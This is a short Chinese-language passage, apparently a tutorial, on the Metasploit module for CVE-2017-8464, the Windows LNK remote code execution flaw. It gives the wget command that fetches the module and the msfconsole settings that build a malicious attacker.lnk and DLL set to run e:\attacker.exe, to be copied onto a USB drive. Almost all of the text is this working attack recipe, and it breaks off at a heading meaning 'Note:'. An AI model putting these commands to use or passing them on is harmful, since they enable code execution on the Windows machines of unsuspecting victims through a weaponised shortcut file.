本文着重测试msf脚本,然后将exp拷贝至U盘。下载msf脚本:
$ cd /usr/share/metasploit-framework/modules/exploits/windows/fileformat/$ ls -al | grep cve_2017_8464_lnk_rce.rb# 如果存在,就不需要下载$ wget https://raw.githubusercontent.com/ykoster/metasploit-framework/master/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
生成exp:
> use exploits/windows/fileformat/cve_2017_8464_lnk_rce> set payload windows/x64/exec> set dllname attacker.dll> set filename attacker.lnk> set cmd e:\attacker.exe> set EXITFUNC thread > exploit
注意: